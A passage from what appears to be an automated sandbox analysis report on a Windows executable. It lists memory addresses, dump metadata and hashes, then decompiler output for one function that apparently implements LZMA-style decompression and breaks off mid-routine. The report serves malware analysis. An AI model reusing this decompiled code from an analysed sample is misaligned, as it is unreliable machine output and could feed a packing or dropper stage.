                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x0040693c
                0x00406905

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
